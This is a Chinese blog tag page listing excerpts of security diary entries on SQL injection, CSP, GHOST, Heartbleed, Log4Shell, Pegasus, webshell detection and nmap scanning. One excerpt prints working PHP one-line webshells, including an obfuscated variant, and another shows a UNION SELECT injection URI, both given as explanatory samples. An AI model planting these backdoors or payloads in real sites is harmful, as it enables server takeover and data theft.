標籤:nidBox 中所有 security 相關日記

note: mysql_real_escape 不安全性 (SQL Injection)

 mini
過去有些資料建議採用 mysql_real_escape_string 來過濾 POST / GET 的資料以避免 SQL Injection但仍有方法繞過 mysql_real_escape_string 的過濾功能參考 http://www.blackhatlibrary.net/SQL_injection例如 client 下的 URI /article.php?id=1 UNION ALL SELECT 1,group_concat(t...

Web Security:護國神山要求的網站安全設定 HSTS、XSS、Content-Security-Policy ...

 mini
據說某護國神山會要求協力廠商達到一定程度資安標準甚至針對協力廠商,給出資安掃描報告(全球首個半導體資安標準SEMI E187出爐,台積電與工研院號召臺灣多家半導體與資安業者制定與推動,臺灣制定國際標準新突破)針對網�...

Linux「GHost」漏洞! CVE-2015-0235

 mini
Heap-based buffer overflow in the __nss_hostname_digits_dots function in glibc 2.2, and other 2.x versions before 2.18, allows context-dependent attackers to execute arbitrary code via vectors related to the (1) gethostbyname or (2) gethostbyname2 function, aka "GHOST."ithome 有詳細說�...

Content-security-policy 範例

 mini
CSPcontent-security-policy主要是用於阻擋 Cross-Site Scripting (XSS) 攻擊可以要求瀏覽器是否允許那些網域的 css/js 可以使用、inline js/css 能否使用看範例Yahoo 股市的 CSP完整content-security-policy-report-only: connect-src 'self' https://*.yahoo.com http...

OpenSSL 重大漏洞 Heartbleed

 mini
編號 CVE-2014-0160 的 OpenSSL 漏洞今天爆出來....被稱為 Heart bleed = 心臟出血可見這個漏洞有多嚴重這個漏洞能讓攻擊者從伺服器的記憶體中讀取 64 KB 的資料 (不用登入伺服器或是特殊權限、管道)這 64KB 的資料中可能包含 SSL 的 privat...

Apache log4j 漏洞,非常嚴重 世紀大漏洞

 mini
Apache Log4j 漏洞編號 CVE-2021-44228 命名「 Log4Shell」風險等級 10 分 (最嚴重的 10分) 最白話的方式解釋 log4j 漏洞:從監視攝影機理解 Log4j 跟 Log4Shell 漏洞 (cymetrics.io) 那些軟體有 log4j 漏洞幾乎有名有姓的網路公司、軟體公司都有此�...

iPhone 漏洞 (Pegasus 、Triangulation)

 mini
兩年前的 Pegasus 飛馬間諜軟體, 以色列 NSO Group 開發能夠讀取簡訊、跟蹤通話、收集密碼、追蹤位置、 iPhone 麥克風和攝像頭不過攻擊的成本很高,多用來對付黨政軍重要人士... 一般民眾被駭的機率不高據說有 5 萬人遭駭,18個...

note: HTTP_X_FORWARDED_FOR 的偽造、安全性

 mini
HTTP_X_FORWARDED_FOR這個值是可以 (容易) 偽造的也不一定能透過這個值來取得用戶端的真實 IPHTTP_X_FORWARDED_FOR 的值可能長的像這樣: unknown (看!怪資料) 192.168.0.12, 192.168.236.1 (多組 IP !l...

一句話木馬 簡單偵測

 mini
各種 PHP【一句話木馬】 <?php eval($_POST[g]);?> <?php $aa = str_replace(x,"","axsxxsxexrxxt");$aa($_POST["test"]); ?>例如:<?phpfunction fo(){ //do something echo "123"; return true;}$funname = 'fo';//$funname = $_GET[&qu...

Apache Httpd SSL/TLS , SWEET32

 mini
SWEET32生日攻擊 檢測方式:用 nmap 掃描,若有問題 會有 warnings 提示: nmap --script ssl-enum-ciphers -p 443 "www.xxxx.com.tw"Starting Nmap 7.70 ( https://nmap.org ) at 2023-12-07 13:49 CSTNmap scan report for www.xxxx.com.tw (60.251.xx.xx)Host is up (0.0097s latency)....

7/15 twitter 多位名人帳號被貼詐騙訊息

 mini
7/15 多位名人的 twitter 帳號被駭,被貼上詐騙訊息包含美國前總統歐巴馬(Barack Obama)、民主黨總統候選人拜登(Joe Biden)、亞馬遜老闆貝佐斯(Jeff Bezos)、特斯拉老闆馬斯克(Elon Musk)、微軟公司共同創辦人比爾蓋茲Bill Gates、股神巴菲特...

SQL Injection 基本防範 / MySQL 筆記

 mini
SQL Injection 基本介紹簡稱隱碼攻擊,中國大陸稱作SQL注入攻擊..SQL資料隱碼攻擊 (wiki)這幾篇是很白話的介紹︰PHP+MySQL环境下SQL Injection攻防总结 (簡體)SQL Injection with MySQL (簡體)SQL Injection (資料隱碼)– 駭客的 SQL填空遊戲(上) (micr...

各國 IPv4 網段分配資料

 mini
https://zh.wikipedia.org/wiki/各國IPv4位址分配列表這裡可下載完整的各國 IP 分配表: (3MB+)http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest若要查詢某國家 IP 的範圍:下載全部資料:$ wget http://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest ...

資安相關的搜尋網站/工具

 mini
LeakIXhttps://leakix.net/這個比較恐怖,可以查到 server 上有哪些服務有漏洞例如那些 server 有未加密的 elasticsearch 資料庫、phpinfo() 資訊洩漏、Apache httpd Status 資訊洩漏...shodanhttps://www.shodan.io/可以查詢網路上各主機的公開資訊ONYPHEhttps:...